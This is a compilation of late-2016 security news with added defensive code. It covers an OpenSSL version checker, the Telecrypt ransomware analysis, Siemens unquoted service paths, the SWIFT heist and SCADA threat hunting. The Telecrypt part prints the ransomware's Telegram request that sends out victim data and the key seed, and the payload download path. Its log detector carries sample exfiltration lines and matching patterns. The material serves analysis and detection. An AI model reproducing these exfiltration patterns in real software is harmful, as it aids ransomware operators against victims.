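        return "unsupported" if today > EOL_1_0_1 else f"end-of-life {EOL_1_0_1.isoformat()}"
    return "supported"


def assess(text: str, today: date = date(2016, 11, 11)) -> dict:
    """Combine both checks; the default date is the advisory's publication week."""
    return {
        "version": text.strip(),
        "affected_by_cve_2016_7054": affected_by_cve_2016_7054(text),
        "support": support_status(text, today),
    }


def assess_local_openssl(today: Optional[date] = None) -> dict:
    """Run `openssl version` on this host; the only function needing a real binary."""
    banner = subprocess.run(["openssl", "version"], capture_output=True,
                            text=True, check=True).stdout
    return assess(banner, today or date.today())


if __name__ == "__main__":
    for sample in ("OpenSSL 1.1.0b", "OpenSSL 1.1.0c", "OpenSSL 1.0.2j", "OpenSSL 1.0.1u"):
        print(assess(sample))
```

Note that a 1.0.2 host reports "not affected" here even though the separate low-severity CVE-2016-7055 does touch 1.0.2; that fix is stated above to be pending, so a complete inventory check would track it as a second, independent item.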

MalwareMustDie is closed for protest against the NSA
11.11.2016 securityaffairs Virus

The legendary MalwareMustDie blog has been closed in protest against traces of NSA hacking found on educational and public servers in harmless countries.
The Shadow Brokers, the hacker group that hacked the NSA’s hackers and previously released NSA hacking tools for anyone to download, has published more files containing IP addresses in 49 countries that were hacked by the US National Security Agency. Security experts in several media outlets link these nodes to the activity of the Equation Group.

The MalwareMustDie (MMD) group began focusing its attention on the case because Japan appeared to be the second most hacked country in the list, and it had not been listed as a known target of Equation Group (EQGRP) activity so far.

In the meantime, the malware used by EQGRP to infect Linux and Solaris platforms has been reversed and published in full detail by CERT Antiy, except for the hashes, which were not shared in their publication.


Figure 1. The reverse of Linux and Solaris malware used by Equation Group

Researchers in the MalwareMustDie group started digging into the details and discovered that several accessible parts of the listed environments carried, during the specific known period, traces of unknown suspicious malicious code and activity matching the period and activity mentioned in several published reports. So far the group is avoiding public disclosure of what it found.

As this investigation progressed, a new awareness has arisen, with evidence that universities and schools, Internet Service Providers (ISPs), a public mail service, a cable television network, a national NIC network, an entertainment network, government offices, and possibly more, have been at risk of violation by unauthorized access and malicious activity. Since the investigation was based on the list originating from the Shadow Brokers’ post, the spy entities of the country the list points to are assumed to be responsible for the acts.


Figure 2. Shadow Broker’s list of infected nodes in Japan with PITCHIMPAIR & INNOVATION

Given how the platform was used, the facts of this sad event may also relate to what Der Spiegel reported in the past about leaked NSA documentation:


Figure 3. Der Spiegel’s published description of the hacking inquiries of NSA

The emerging verdict that a friendly country was spotted violating the services of its allies is a very bitter pill to swallow, but the traces were there and that is the reality. Mass offensive acts of this level using hacking and malware would need the approval of the attacker’s operational authority, and obviously the attacker’s government also knew about and authorized the act.

As the conclusions of the investigation began to take shape, MalwareMustDie, an entity opposed to any use of malicious software (malware) in any form, known for its anti-malware research and analysis blog that for four long years has produced research against malware, cybercrime and vandalism on the Internet, decided, as a legitimate protest, to close its analysis blog for an undefined period, leaving the following statement on its Twitter profile:


Figure 4. The protest statement of MalwareMustDie against the NSA hacking

“For this reason, MMD blog is closed for an undefined period. USA related entities and researchers’ access to direct communication & research is prohibited under the same condition. Furthermore”, they continue, “we stop using any of US services or products for our research.”

The title of the blog is clear, and the position of MalwareMustDie is just as clear: using malware, in any activity and for any purpose, is simply not accepted. “What is BAD stays BAD, no matter who you are. And if we can not do things strictly right, we can never stop “wrong” or “bad” things in the internet”. And it is correct, because, really, malware must die.

DDoS útoků přibývá. Na vině je i laxnost uživatelů

10.11.2016 Novinky/Bezpečnost Počítačový útok
Útoky nejrůznějších botnetů – tedy sítí zotročených počítačů i mobilů – jsou stále častější. Za uplynulé čtvrtletí byly podle antivirové společnosti Kaspersky Lab napadeny tímto způsobem cíle v 67 zemích. Kyberzločincům přitom práci velmi usnadňuje i laxnost samotných uživatelů.
Co je DDoS

Útok DDoS (Distributed Denial of Service) má vždy stejný scénář. Stovky tisíc počítačů začnou přistupovat v jeden okamžik na konkrétní server. Ten zpravidla nezvládne tak vysoké množství požadavků zpracovat a spadne. Pro běžné uživatele se pak takto napadená webová stránka tváří jako nedostupná.
Ve třetím kvartále byly botnetovými útoky napadeny cíle celkem v bezmála sedmi desítkách zemí. Zatímco v Japonsku, Spojených státech a Rusku počty útoků vzrostly, počty čínských a jihokorejských obětí naopak znatelně klesly.

Zajímavé je rozhodně i to, že ve zmiňovaném čtvrtletí se poprvé mezi prvními 10 zeměmi s nejvyšším počtem zaznamenaných DDoS útoků objevily tři západoevropské státy – Itálie, Francie a Německo.

Nejčastější jsou útoky na Čínu
Nejvíce DDoS útoků bylo nicméně ve sledovaném období cíleno na Čínu, i když ve srovnání s předchozím čtvrtletím jde o pokles. Konkrétně jen na populární čínský vyhledávač Baidu bylo vedeno dohromady 19 útoků, přičemž byl tento poskytovatel zároveň vystaven nejdéle trvajícímu útoku ve třetím čtvrtletí – rekordních 184 hodin.

K podobným útokům pomáhají nevědomky počítačovým pirátům také někteří uživatelé, které si příliš nelámou hlavu se zabezpečením svých zařízení. Je nutné podotknout, že řeč není pouze o chytrých telefonech a klasických počítačích, ale například také o tzv. zařízení internetu věcí (IoT) – tedy například nejrůznější kamery, které se mohou připojovat k internetu.

Právě tato zařízení se stala součástí obřího botnetu, který využili kyberzločinci na konci října na útok na DNS servery společnosti Dyn. Ty standardně překládají webové adresy na číselné adresy fyzických počítačů (IP adresy). Právě proto se podařilo hackerům vyřadit z provozu na východním pobřeží USA hned několik velkých webů – tím, že nefungoval překladač (DNS servery), webové prohlížeče po zadání adresy nevěděly, kam se mají připojit.

Uživatelé se tak nemohli připojit například na sociální sítě Twitter a Facebook, zpravodajské servery Daily News, CNN i New York Times a hudební portály Spotify a Soundcloud.

Uživatelé by měli dbát na zabezpečení
K útokům na koncové uživatele využívají počítačoví piráti velmi často různé viry, prostřednictvím kterých mohou napadenou stanici ovládat na dálku. Tu pak přiřadí do obřího botnetu, s jehož pomocí pak v případě dostatečné velikosti mohou vyřadit z provozu prakticky libovolný cíl na internetu.

So it is primarily users themselves who can prevent DDoS attacks, by placing sufficient emphasis on the security of their devices.

Loop of Confidence
10.11.2016 Kaspersky Crime
With the arrival of Apple Pay and Samsung Pay in Russia, many are wondering just how secure these payment systems are, and how popular they are likely to become. A number of experts have commented on this, basing their opinions on the common stereotypes of Android being insecure and the attacks which currently take place on wireless payments. In our opinion however, these technologies require a more detailed examination and a separate evaluation of the threats they face.

The conventional approach

Traditional threats associated with the use of bank cards in ATMs and physical stores have already been studied and described in sufficient detail:

the magnetic strip can be read using skimmers; modern versions of skimmers are advanced and very inconspicuous;
to read EMV chips, dedicated skimmers have been designed that are planted into payment terminals;
wireless payment systems (PayPass, PayWave) are potentially vulnerable to contactless, remote card reading attacks.
However, the growth in popularity of mobile devices has given rise to a new type of wireless mobile payment: a regular card payment can now be emulated using the smartphone’s built-in NFC antenna. The functionality is turned on at the request of the user, meaning there’s less risk than carrying around a card that’s constantly ready to make a payment. Bank clients, in turn, don’t have to take out their wallets when making a payment, and don’t even have to carry their bank cards around with them.

The technology for emulating cards on mobile devices (Host Card Emulation, HCE) may have been inexpensive and available to a broad range of device users starting from Android 4.4, but it had several drawbacks:

the payment terminal had to support wireless payments;
the eSE (embedded Secure Element) chip made the device more expensive, so initially it was incorporated into just a few top-of-the-range devices from major manufacturers;
if the manufacturer decided to cut costs on secure data storage, important information ended up being stored by the operating system which could be attacked by malware with root privileges on the device. However, this didn’t go beyond a few proof-of-concept attacks, because there are plenty of other easier ways of attacking mobile banking systems;
the developers attempted to mitigate the risks associated with storing important payment information on a mobile device, e.g. by using secure element in the cloud. This made smartphone-assisted payments unavailable in locations with unstable mobile services;
the risks associated with using software-based HCE storage made it highly advisable to introduce extra security measures into banking applications, making their development more complicated.
As a result, for many large banks, as well as users, paying with the help of card emulation using a smartphone is little more than a quirky feature used for promos or simply to show off in public.

New technologies

The problems described above have given rise to a number of studies, including some by large international companies, in search of more advanced technologies. The next step in the evolution of mobile payments was tokenized payment systems proposed by major market players – Apple, Samsung, and Google. Unlike card emulation on the device, these systems are based on exchanging tokens. A token is a unique transaction ID; the card details are never sent to the payment terminal. This addresses the problem of payment terminals being compromised by malware or skimmers. Unfortunately, this approach has the same problem: the technology has to be adopted and maintained by the manufacturer of the payment terminal.


Several years ago, a startup project called LoopPay attempted to address this problem. The developers proposed a kit consisting of a regular card reader for a 3.5 mm (1⁄8 in) audio jack and a phone case. Their know-how was a patented technology for emulating a bank card magnetic strip using a signal generated by their dedicated device. It has to be said that the creators took an early interest in secure data storage (on a dedicated device rather than on the phone) and protection from using the details of other people’s bank cards (personal data checked by comparing information about the user against information from the bank card’s Track 1 information). Later on, Samsung became interested in LoopPay and acquired the startup. After some time, the Magnetic Secure Transmission (MST) technology became available, complementing Samsung Pay tokenized payments. As a result, regular users can use their smartphones to make payments at payment terminals that support new wireless payment technologies and use MST at any type of terminal by just placing their device next to the magnetic strip reader.

We have been monitoring this project closely, and can now safely say that this technology is, on the whole, a big step forward in terms of convenience and security, because its developers have addressed lots of relevant risks:

secure element is used to reliably store data;
activation of payment mode on the phone requires the user to enter a PIN code or use a fingerprint;
on Samsung devices, a KNOX security solution and basic antivirus are pre-installed – these two block payment features when malware lands on the device;
KNOX Tamper Switch – an object of hate among forum-based “experts” – protects against more serious rootkit malware. KNOX Tamper Switch is a software and hardware appliance that irreversibly blocks the device’s business and payment features during any privilege escalation attacks;
payment functionality is only available from new devices for which security updates are available, and on which all vulnerabilities are quickly patched;
on some of the Samsung smartphones sold in Russia, Kaspersky Internet Security for Android is pre-installed. This provides extended protection from viruses and other mobile threats.
It should be noted that Samsung Pay, when making payments, uses a virtual card whose number is not available to the user, rather than the actual banking card tied to the user’s account. This method of payment works just fine when there is no Internet connection.

New old threats

There’s no doubt that the new technology has become an object of interest for security researchers. Potential attacks do exist for it and were presented at the latest BlackHat USA conference. These attacks may still only be potential threats, but we should still stay alert. Banks are just planning to introduce biometric authentication on ATMs in 2017, but cybercriminals are already collecting intelligence on which hardware manufacturers are involved, what sort of vulnerabilities exist in the hardware, etc. In other words, the technology is not even available to the wider public yet, but cybercriminals are already searching for weaknesses.

Cybercriminals are also studying Apple's and Samsung's technologies. To make things worse for Russian users, these technologies only arrive in the Russian market a year after they are launched in Western countries.


Cybercriminals discussing the prospects of exploiting Apple Pay in Russia

At the same time, cybersecurity researchers tend to forget about conventional fraud, which mobile vendors are completely unprepared for as they enter a new sphere of business. Wireless payments have made card fraudsters’ lives much easier both in terms of online trade and shopping in regular stores. They no longer have to use a fake card with stolen card data recorded onto it, and thus run the risk of getting caught at the shop counter – now they can play it much safer by paying for merchandise with a stolen card attached to a top-of-the-range phone.

Alternatively, a fraudster can simply buy merchandise and gift cards in an Apple Store. In spite of all the security measures taken by Apple, the Apple Pay fraud rate in the US was 6% in 2015, or 60 times greater than the 0.1% bank card fraud.

Samsung Pay also sacrificed some of the useful anti-fraud features for usability after it purchased the startup; one of them was the requirement that accounts be rigidly tied to the cardholder’s name. For instance, I added my own bank card to my smartphone, and then added my colleague’s as well; in the original LoopPay solution, this was impossible.

To conclude, it’s now safe to say that the new tokenized solutions are indeed more secure and convenient compared to their predecessors. However, there’s still plenty of room for improvement when it comes to security, and that’s very important for the future prospects of the technology. After all, no one likes to lose money, be it banks or their clients.

The first cryptor to exploit Telegram
10.11.2016 Kaspersky Exploit
Earlier this month, we discovered a piece of encryption malware targeting Russian users. One of its peculiarities was that it uses Telegram Messenger’s communication protocol to send a decryption key to the threat actor. To our knowledge, this is the first cryptor to use the Telegram protocol in an encryption malware case.

What is a cryptor?

In general, cryptors can be classified into two groups: those which maintain offline encryption and those which don’t.

There are several reasons why file encryption malware requires an Internet connection. For instance, the threat actors may send an encryption key to the cryptor and receive data from it which they can later use to decrypt the victim’s encrypted files.

Obviously, a special service is required on the threat actor’s side to receive data from the cryptor malware. That service must be protected from third-party researchers, and this creates extra software development costs.

Analyzing the Telegram Trojan

The Telegram Trojan is written in Delphi and is over 3MB in size. After launching, it generates a file encryption key and an infection ID (infection_id).

Then it contacts the threat actors using the publicly available Telegram Bot API: the Trojan operates as a Telegram bot and uses that public API to communicate with its creators.

In order for that to happen, the cybercriminals first create a “Telegram bot”. A unique token from the Telegram servers identifies the newly-created bot and is placed into the Trojan’s body so it can use the Telegram API.

The Trojan then sends a request to the URL <token>/GetMe, where <token> is the unique ID of the Telegram bot created by the cybercriminals. According to the official API documentation, the method ‘getMe’ checks whether a bot with the specified token exists and returns basic information about it. The Trojan does not use the information about the bot that the server returns.

The Trojan sends the next request using the method ‘sendMessage’, which allows the bot to send messages to the chat with the specified number. The Trojan uses the chat number hardwired into its body, and sends an “infection successful” report to its creators: <token>/sendmessage?chat_id=<chat>&text=<computer_name>_<infection_id>_<key_seed>

The Trojan sends the following parameters in the request:

<chat> – number of the chat with the cybercriminal;

<computer_name> – name of the infected computer;

<infection_id> – infection ID;

<key_seed> – number used as a basis to generate the file encryption key.

After sending the information, the Trojan searches the hard drives for files with specific extensions, and encrypts them bytewise, using the simple algorithm of adding each file byte to the key bytes.
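To make the weakness of that scheme concrete for a responder, here is an added model of it (not Kaspersky's analysis code and not the Trojan's code): a byte-add cipher, its inverse, and a known-plaintext key recovery. Because every ciphertext byte is plaintext plus key byte (mod 256), a fixed file header such as the PNG signature gives the key bytes at those positions directly. The 16-byte key, the key length and the sample file are constructed assumptions; the page does not say how Telecrypt derives its key bytes from key_seed, so the key is simply treated as given.

```python
from typing import Optional


def byte_add_encrypt(data: bytes, key: bytes) -> bytes:
    """Model of the scheme in the analysis: each file byte is added (mod 256)
    to the key byte at the same position, the key repeating."""
    return bytes((b + key[i % len(key)]) & 0xFF for i, b in enumerate(data))


def byte_add_decrypt(data: bytes, key: bytes) -> bytes:
    """Inverse of byte_add_encrypt: subtract the same key byte (mod 256)."""
    return bytes((b - key[i % len(key)]) & 0xFF for i, b in enumerate(data))


def recover_key(ciphertext: bytes, known_plaintext: bytes, key_len: int) -> Optional[bytes]:
    """Known-plaintext recovery: key[i] = cipher[i] - plain[i] (mod 256).
    Needs at least key_len bytes of known plaintext at the file start."""
    if len(known_plaintext) < key_len or len(ciphertext) < key_len:
        return None
    return bytes((c - p) & 0xFF for c, p in zip(ciphertext[:key_len], known_plaintext[:key_len]))


# PNG files begin with a fixed 16-byte prefix: the 8-byte signature, then the
# IHDR chunk length (13) and chunk type. Any format with a fixed header works.
PNG_KNOWN_PREFIX = b"\x89PNG\r\n\x1a\n\x00\x00\x00\x0dIHDR"

# Constructed sample (assumption, not real Telecrypt data): a 16-byte key and a
# tiny PNG-like file whose first 16 bytes are the known prefix above.
SAMPLE_KEY = bytes(range(0x51, 0x61))
SAMPLE_FILE = (PNG_KNOWN_PREFIX
               + b"\x00\x00\x00\x10\x00\x00\x00\x10\x08\x06\x00\x00\x00"
               + b"constructed-body")


def demo() -> tuple:
    """Encrypt the sample, recover the key from the header alone, decrypt.
    Returns (key recovered correctly, file decrypted correctly)."""
    encrypted = byte_add_encrypt(SAMPLE_FILE, SAMPLE_KEY)
    recovered = recover_key(encrypted, PNG_KNOWN_PREFIX, len(SAMPLE_KEY))
    return recovered == SAMPLE_KEY, byte_add_decrypt(encrypted, recovered) == SAMPLE_FILE


if __name__ == "__main__":
    print(demo())
```

The point for incident response is that files of a known type with a fixed header (PNG, ZIP, PDF, Office documents) act as a free decryption oracle for an additive stream like this, which is why the vendor can offer decryption without the criminals' key and why paying is unnecessary.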


File extensions selected for encryption

Depending on its configuration, the Trojan may add the extension ‘.Xcri’ to the encrypted files, or leave the extension unchanged. The Trojan’s sample that we analyzed does not change file extensions. A list of encrypted files is saved to the text file ‘%USERPROFILE%\Desktop\База зашифр файлов.txt’.

After encryption, the Trojan sends the request <token>/sendmessage?chat_id=<chat>&text=<computer_name>_<infection_id>_<key_seed>stop.

In this request, all parameters are the same as in the previous request, but the word ‘stop’ is added at the end.
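The two sendMessage requests give a defender a clean detection signature. The following added example (not Kaspersky's code) parses constructed proxy log lines for Telegram Bot API calls, extracts the computer name, infection ID and key_seed from the message text, and distinguishes the initial report from the ‘stop’ report that marks the end of encryption. It assumes TLS inspection at the proxy so that full URLs are logged (without it only CONNECT api.telegram.org:443 is visible and the same logic has to run on endpoint telemetry); the host name api.telegram.org comes from Telegram's Bot API documentation, and the bot tokens, chat id and addresses are placeholders.

```python
import re
from collections import namedtuple
from typing import Dict, List, Optional
from urllib.parse import parse_qs

# Constructed proxy log excerpt: "<epoch> <client> <method> <url> <status>".
# Tokens, chat ids and hosts are placeholders, not observed values.
SAMPLE_PROXY_LOG = """\
1478770001.123 10.0.4.17 GET https://api.telegram.org/bot111111111:CONSTRUCTED_TOKEN_AAAAAAAAAAAA/GetMe 200
1478770002.456 10.0.4.17 GET https://api.telegram.org/bot111111111:CONSTRUCTED_TOKEN_AAAAAAAAAAAA/sendmessage?chat_id=123456789&text=WS-ACCOUNTING-07_5f3a9c1e_83619274 200
1478770003.789 10.0.4.22 GET https://api.telegram.org/bot222222222:CONSTRUCTED_TOKEN_BBBBBBBBBBBB/sendMessage?chat_id=99&text=deploy+finished 200
1478770990.001 10.0.4.17 GET https://api.telegram.org/bot111111111:CONSTRUCTED_TOKEN_AAAAAAAAAAAA/sendmessage?chat_id=123456789&text=WS-ACCOUNTING-07_5f3a9c1e_83619274stop 200
"""

# Bot API calls have the form https://api.telegram.org/bot<token>/<method>;
# the method name is matched case-insensitively ("sendmessage" in the Trojan).
BOT_API_RE = re.compile(
    r"https?://api\.telegram\.org/bot(?P<token>[^/\s]+)/(?P<method>getme|sendmessage)"
    r"(?:\?(?P<query>\S*))?",
    re.IGNORECASE,
)
# Message body described in the analysis: <computer_name>_<infection_id>_<key_seed>[stop]
SEED_RE = re.compile(r"^(?P<seed>\d+)(?P<stop>stop)?$")

Alert = namedtuple("Alert", "client phase bot_id computer_name infection_id key_seed")
PHASE_RANK = {"bot_check": 0, "infection_reported": 1, "encryption_finished": 2}


def classify_url(client: str, url: str) -> Optional[Alert]:
    """Return an Alert for a Telecrypt-style Bot API request, else None."""
    m = BOT_API_RE.search(url)
    if not m:
        return None
    bot_id = m.group("token").split(":", 1)[0]  # keep the bot id only, never log the full token
    if m.group("method").lower() == "getme":
        return Alert(client, "bot_check", bot_id, None, None, None)
    text = parse_qs(m.group("query") or "").get("text", [""])[0]
    parts = text.rsplit("_", 2)  # computer names may contain no underscore, ids might
    if len(parts) != 3:
        return None  # some other bot's message; not the Telecrypt layout
    seed = SEED_RE.match(parts[2])
    if not seed:
        return None
    phase = "encryption_finished" if seed.group("stop") else "infection_reported"
    return Alert(client, phase, bot_id, parts[0], parts[1], seed.group("seed"))


def scan_proxy_log(log_text: str) -> List[Alert]:
    """Run the classifier over every log line; field 1 is the client, field 3 the URL."""
    alerts = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        alert = classify_url(fields[1], fields[3])
        if alert:
            alerts.append(alert)
    return alerts


def summarize(alerts: List[Alert]) -> Dict[str, str]:
    """Highest phase reached per client; 'encryption_finished' means the
    'stop' report was seen and the files on that host are already encrypted."""
    state: Dict[str, str] = {}
    for a in alerts:
        current = state.get(a.client)
        if current is None or PHASE_RANK[a.phase] > PHASE_RANK[current]:
            state[a.client] = a.phase
    return state


if __name__ == "__main__":
    found = scan_proxy_log(SAMPLE_PROXY_LOG)
    for a in found:
        print(a)
    print(summarize(found))
```

A getMe call on its own is only weak evidence (legitimate bots do the same), so it is reported as a low-severity bot_check; the three-part message body is the discriminating feature, and the key_seed it carries is worth preserving in the ticket because it is the input to the file key.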

Then the Trojan downloads the extra module Xhelp.exe (URL: http://***.ru/wp-includes/random_compat/Xhelp.exe) from a compromised site created using WordPress, and launches it. This module, called “Informer” (‘Информатор’ in the original Russian) by the cybercriminals, has a graphical interface and informs the victim about what has happened, and puts forward the ransom demand. The ransom is 5,000 RUB which is accepted via Qiwi or Yandex.Money payment methods.


Screens demonstrated to the victim user

The victim can communicate with the cybercriminals via a dedicated entry field in the “Informer” interface. This feature is also based on sending a Telegram message using the method ‘sendMessage’.

Multiple language mistakes in the ransom texts hint at the educational level of the Trojan’s creators. There is also a final phrase that catches the attention: “Thank you for helping Young Programmers Fund”.

Safeguarding measures

All Kaspersky Lab products detect this threat with the following verdicts:

3e24d064025ec20d6a8e8bae1d19ecdb – Trojan-Ransom.Win32.Telecrypt.a (the main module)
14d4bc13a12f8243383756de92529d6d – Trojan-Ransom.Win32.Telecrypt.a (the ‘Informer’ module).

If you have fallen victim to this encryption malware, we strongly advise you not to pay the ransom. Instead, contact Kaspersky Lab’s support team and we will help you decrypt your files.

SWIFT Hack: Bangladesh Bank Recovers $15 Million from a Philippines Casino
10.11.2016 thehackernews Hacking
Part of the $81 Million stolen from Bangladesh bank's New York Federal Reserve account earlier this year in the wake of the major malware attack on the SWIFT interbank transfer network has been tracked down to a casino in the Philippines.
SWIFT, or Society for Worldwide Interbank Telecommunication, is a global financial messaging system that thousands of banks and organizations around the world use to transfer billions of dollars every day.
In February, hackers dropped a piece of malware on a SWIFT terminal employed by Bangladesh's central bank, obtained the credentials needed for payment transfers from the New York Federal Reserve Bank, and then transferred large amounts to fraudulent accounts based in the Philippines and Sri Lanka.
In March, the investigation revealed that the stolen money was then sold to a black market foreign exchange broker and later transferred to at least 3 local casinos in the Philippines.
In September, a Philippine court ordered the return to Bangladesh Bank of $15 Million surrendered by a junket operator at Solaire Resort & Casino, Reuters reports.
On Monday, a team from Bangladesh's central bank arrived in Manila to take back $15 Million of the $81 Million in stolen funds, surrendered by Chinese-born Kim Sin Wong, the casino junket operator of Eastern Hawaii Leisure Company.
Wong, who returned $4.63 Million and 488.28 Million pesos (around $10.05 Million) to Philippine authorities, said the stolen money came from two Chinese high-rollers, Gao Shu Hua from Beijing and Ding Zhi Ze from Macau.
However, Wong denied any role in one of the world's biggest bank heists.
The recovered $15 Million amount is now secure in the vaults of the Philippine central bank, said Bangladesh's Ambassador to the Philippines John Gomes, adding that there's more to come.
"The writ of execution that the money be handed back to Bangladesh has already been done by the court," Gomes told Reuters. "The good thing is now that the process on this $15 Million is more or less completed, we will go for the rest."
Bangladesh Bank was not the first bank to fall victim to SWIFT malware. This year, unknown hackers targeted banks across the world by gaining access to SWIFT, which is used to transfer billions of dollars every day.
Investigators also revealed that the malware used in the Bangladesh cyber heist was almost identical to one used to infiltrate banks in Ecuador, Vietnam, and the Philippines.

CVE-2016-7165 Privilege Escalation flaw affects many Siemens solutions
10.11.2016 securityaffairs Vulnerebility
Siemens has released security updates and temporary fixes to address a privilege escalation vulnerability, tracked as CVE-2016-7165, that affects several industrial products.

The flaw could be exploited by attackers to escalate their privileges if the flawed products are not installed under the default path.

Users with local access to the Windows system running on the same device as affected Siemens applications can escalate their privileges under certain conditions.

“Unquoted service paths could allow local Microsoft Windows operating system users to escalate their privileges if the affected products are not installed under their default path (“C:\Program Files\*” or the localized equivalent),” reads the advisories published by both Siemens and ICS-CERT.


The privilege escalation flaw was reported to Siemens by WATERSURE and KIANDRA IT.

The products affected by this vulnerability are widely adopted by many organizations; the impact of its exploitation depends on each specific deployment.

The CVE-2016-7165 flaw affects several products, including Siemens SCADA systems, distributed control systems (DCS). It also affects engineering tools and simulators such as SIMATIC, SINEMA, TeleControl, SOFTNET, SIMIT, Security Configuration Tool (SCT) and Primary Setup Tool (PST) products.

The updates released by Siemens cover only some of the products; for the other systems the company suggested applying temporary fixes.
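The check an administrator wants here is whether any installed service still has an unquoted ImagePath containing spaces, and what the quoted form should be. The following added example (not Siemens' or ICS-CERT's code) implements that audit over constructed service entries; the service names and paths are placeholders. The candidate names it lists follow the documented Windows CreateProcess behaviour for an unquoted path with spaces (each prefix up to a space, with .exe appended); their parent directories are the ones whose write permissions have to be verified, which is why the advisory scopes the risk to installations outside the default "C:\Program Files\*" path.

```python
import ntpath
import re
from typing import List, NamedTuple, Tuple


class Finding(NamedTuple):
    service: str
    image_path: str
    unquoted_with_spaces: bool
    directories_to_check: List[str]  # parents of the candidate names; verify their write ACLs
    corrected_path: str              # ImagePath with the executable quoted


EXE_RE = re.compile(r"\.exe\b", re.IGNORECASE)


def split_image_path(image_path: str) -> Tuple[str, str, bool]:
    """Return (executable, trailing arguments, was_quoted) for a service ImagePath."""
    s = image_path.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        if end == -1:
            return s[1:], "", True
        return s[1:end], s[end + 1:], True
    m = EXE_RE.search(s)
    if not m:
        return s, "", False  # no .exe suffix: treat the whole string as the path
    return s[:m.end()], s[m.end():], False


def search_prefixes(exe: str) -> List[str]:
    """Names tried, in order, for an unquoted executable path containing spaces."""
    parts = exe.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def audit_service(name: str, image_path: str) -> Finding:
    exe, args, quoted = split_image_path(image_path)
    risky = (not quoted) and (" " in exe)
    dirs = sorted({ntpath.dirname(p) for p in search_prefixes(exe)}) if risky else []
    corrected = f'"{exe}"{args}' if risky else image_path
    return Finding(name, image_path, risky, dirs, corrected)


def audit(services: List[Tuple[str, str]]) -> List[Finding]:
    return [audit_service(name, path) for name, path in services]


# Constructed entries as they might be read from the registry or `sc qc`;
# the service names and paths are hypothetical, not Siemens' real ones.
SAMPLE_SERVICES = [
    ("HypotheticalSiemensSvc", r"C:\Program Files\Siemens\Some Product\service.exe"),
    ("CustomInstallSvc", r"D:\Custom Install\Siemens\Some Product\service.exe -k auto"),
    ("QuotedSvc", r'"D:\Custom Install\Siemens\Some Product\service.exe" -k auto'),
    ("NoSpaceSvc", r"C:\Windows\System32\svchost.exe -k netsvcs"),
]

if __name__ == "__main__":
    for f in audit(SAMPLE_SERVICES):
        if f.unquoted_with_spaces:
            print(f.service, "->", f.corrected_path, "check:", f.directories_to_check)
```

On a live system the same function can be fed the output of `Get-CimInstance Win32_Service` (its PathName property) or the ImagePath values under HKLM\SYSTEM\CurrentControlSet\Services; the first entry above illustrates the advisory's point: it is flagged as unquoted, but its directories are under the default path, where standard users cannot write.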

In October, the US ICS-CERT published its annual vulnerability coordination report for the fiscal year 2015. The report included detailed information about the security vulnerabilities reported to the US ICS-CERT in 2015.

“ICS-CERT is pleased to announce the release of the NCCIC/ICS-CERT FY 2015 Annual Vulnerability Coordination Report. This report provides a summary of the DHS NCCIC/ICS-CERT vulnerability coordination activities for FY 2015. A link to the full document can be found on the ICS-CERT web site ICS-CERT Info Products web page.” reported the ICS-CERT.

According to the annual vulnerability coordination report, the overall number of security flaws disclosed by the US ICS-CERT was 427, whereas in 2014 the number of vulnerabilities was 245.

This means that the number of flaws disclosed by the US ICS-CERT has increased by 74 percent.

SCADA Sssh! Don’t Talk, Filter it
10.11.2016 securityaffairs Attack

The effects of cyber-attacks against SCADA/ICS are well known; however, there is great confusion when it comes to mitigation techniques.
The majority are aware of the impact cyber-attacks can have on Industrial Control Systems; however, the reality in terms of mitigation techniques is shrouded in confusion and a reactive approach. The recent 0-day vulnerability dubbed ‘Panel Shock’, found in Schneider Electric’s SCADA Human Machine Interface (HMI) device panels, sent ripples of fear and doubt through the industry; somehow the dirty linen has been exposed again.

The media generally refer to all Industrial Control Architectures as SCADA and, to avoid autocratic debates with various security voice groups, we will continue this trend. It is not difficult to map the behaviour classification of SCADA attack patterns by observing recent campaigns such as Havex, BlackEnergy and Stuxnet. In these attacks, the malware was mostly distributed by phishing attacks aimed at executives not on the ICS network and by watering hole attacks on ICS vendor software delivery websites.

Assessing the Threat

No golden rules exist for how to assess the threat; however, the question asked most often is ‘where do organizations start when assessing the threat?’ Within the RSA Advanced Cyber Defence Practice we follow a set of domains (a framework) to assess and formulate responses to ICS/SCADA threats.


A forthcoming post on the RSA blog site, with Gareth Pritchard (Advanced Cyber Defence Consultant EMEA) and Peter Tran (Snr Director Advanced Cyber Defense at RSA), will give a detailed analysis of each domain.

For today’s article, I want to focus on the element of ‘filtering the white noise’.

One of the core failures of SCADA-based organizations is their inability to filter white noise by dissecting incidents through the combination of hunting, intelligence gathering, and incident attribution. They fail to build a ‘proactive’ customized Use Case library that is required to detect specific and tailored threats targeted at the company. One of the suggested strategies could be a hunt and response strategy i.e.


1) Develop: UseCase Development Strategy

Initial UseCase development. Create tailored use cases from theory, practice and experience to detect the top imminent, perceived or previously detected threats affecting the company. For example: ICS UseCase #1 “Unusual/Unplanned OPC Scan”, ICS UseCase #2 “Suspected C2 communication”, IDS via Emerging Threats.
i) Analysts respond to the alerts generated from the new Use Cases.
ii) Intelligence teams add context and, if possible, attribution to the detected threats.
iii) Content Engineering teams tune use cases from analysis, attribution and context.
Analysts respond to the alerts generated from the tuned Use Cases.
Engineering and Intelligence: Detect & Collect threat data to support additional UseCase development
Develop tailored metrics / reports to detect current threats based on real-world network data.

i) Report 1: Critical Anomaly

Develop metric reports to display anomalous traffic patterns occurring on critical systems by whitelisting expected traffic and displaying the remaining traffic from these devices on a pre-developed reporting template.
Collect log, packet and net-flow data for 30 days, then analyse and condense the report data into a data analysis and metric report in order to highlight and add context to suspected suspicious traffic patterns.
Present and discuss the findings in a meeting with the administrators and engineers of the monitored critical systems to assist in identifying the suspicious, anomalous traffic, which may be used to develop additional UseCases. (Fringe benefit: engage and seed relationships with infrastructure teams, especially those related to critical systems.)
Investigate and consolidate threat intel from perceived anomalous traffic and create custom use cases from this data along with perceived attack scenarios.
3) Hunt: Implement Hunting Development process.

i) Hunters find new threats on the network and raise incidents for investigation.
ii) Intelligence teams add context and, if possible, attribution to the detected threats.
iii) Content Engineering teams create use cases from the newly acquired indicators.
Analysts respond to the alerts generated from the new Use Cases.
iv) Intelligence teams add context and, if possible, attribution to the detected threats.
v) Content Engineering teams tune use cases from analysis, attribution and context.
Analysts respond to the alerts generated from the tuned Use Cases.
4) Enhance: Review UseCase Library

